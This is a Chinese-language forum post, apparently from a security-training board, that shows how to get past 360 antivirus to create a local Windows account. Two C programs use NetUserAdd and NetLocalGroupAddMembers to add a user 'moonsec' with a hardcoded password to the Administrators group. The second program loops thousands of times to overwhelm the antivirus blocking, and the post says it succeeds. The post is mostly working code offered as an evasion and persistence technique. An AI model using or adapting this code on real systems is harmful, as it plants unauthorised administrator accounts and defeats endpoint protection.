找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 49|回复: 0

[原创] 绕过360杀软添加用户

[复制链接]

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-12-12 10:31:53 | 显示全部楼层 |阅读模式
绕过360杀软添加用户

一、前言
正常执行添加命令 net user moonsec /add 拦截

二、代码
准备添加用户的代码
  1. #define _CRT_SECURE_NO_WARNINGS
  2. #ifndef UNICODE
  3. #define UNICODE
  4. #endif
  5. #pragma comment(lib, "netapi32.lib")

  6. #include <stdio.h>
  7. #include <windows.h>
  8. #include <lm.h>

  9. int wmain(int argc, wchar_t* argv[])
  10. {
  11.     USER_INFO_1 ui;
  12.     DWORD dwLevel = 1;
  13.     DWORD dwError = 0;
  14.     NET_API_STATUS nStatus;

  15.     wchar_t username[256] = L"moonsec";
  16.     wchar_t password[256] = L"P@ssw0rd";

  17.     ui.usri1_name = username;
  18.     ui.usri1_password = password;
  19.     ui.usri1_priv = USER_PRIV_USER;
  20.     ui.usri1_home_dir = NULL;
  21.     ui.usri1_comment = NULL;
  22.     ui.usri1_flags = UF_SCRIPT;
  23.     ui.usri1_script_path = NULL;

  24.     nStatus = NetUserAdd(NULL,
  25.         dwLevel,
  26.         (LPBYTE)&ui,
  27.         &dwError);

  28.     if (nStatus == NERR_Success)
  29.         fwprintf(stderr, L"User %s has been successfully added\n", argv[1]);

  30.     else
  31.         fprintf(stderr, "A system error has occurred: %d\n", nStatus);

  32.     LOCALGROUP_MEMBERS_INFO_3 account;
  33.     account.lgrmi3_domainandname = argv[1];

  34.     NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);

  35.     if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS) {
  36.         printf("Administrators added Successfully!");
  37.     }
  38.     else {
  39.         printf("Administrators added Failed!");
  40.     }
  41.     return 0;
  42. }
复制代码
这段代码编译的文件 执行还是会拦截的
可以添加for循环让程序一直添加用户。360有时候会拦截失效
代码
  1. #define _CRT_SECURE_NO_WARNINGS
  2. #ifndef UNICODE
  3. #define UNICODE
  4. #endif
  5. #pragma comment(lib, "netapi32.lib")

  6. #include <stdio.h>
  7. #include <windows.h>
  8. #include <lm.h>

  9. int wmain(int argc, wchar_t* argv[])
  10. {
  11.     USER_INFO_1 ui;
  12.     DWORD dwLevel = 1;
  13.     DWORD dwError = 0;
  14.     NET_API_STATUS nStatus;

  15.     wchar_t username[256] = L"moonsec";
  16.     wchar_t password[256] = L"P@ssw0rd";

  17.     ui.usri1_name = username;
  18.     ui.usri1_password = password;
  19.     ui.usri1_priv = USER_PRIV_USER;
  20.     ui.usri1_home_dir = NULL;
  21.     ui.usri1_comment = NULL;
  22.     ui.usri1_flags = UF_SCRIPT;
  23.     ui.usri1_script_path = NULL;
  24.     for (size_t i = 0; i < 9999; i++)
  25.     {
  26.         nStatus = NetUserAdd(NULL,
  27.             dwLevel,
  28.             (LPBYTE)&ui,
  29.             &dwError);



  30.         for (size_t i = 0; i < 9999; i++)
  31.         {
  32.             nStatus = NetUserAdd(NULL,
  33.                 dwLevel,
  34.                 (LPBYTE)&ui,
  35.                 &dwError);

  36.             if (nStatus == NERR_Success)
  37.                 fwprintf(stderr, L"User %s has been successfully added\n", ui.usri1_name);

  38.             else
  39.                 fprintf(stderr, "error has occurred: %d\n", nStatus);


  40.             LOCALGROUP_MEMBERS_INFO_3 account;
  41.             account.lgrmi3_domainandname = ui.usri1_name;

  42.             NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
  43.         }
  44.       

  45.     }
  46.     return 0;
  47. }
复制代码
终端上运行 360会产生大量拦截,但是还是会添加用户


源码下载




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-8 16:35 , Processed in 0.059456 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表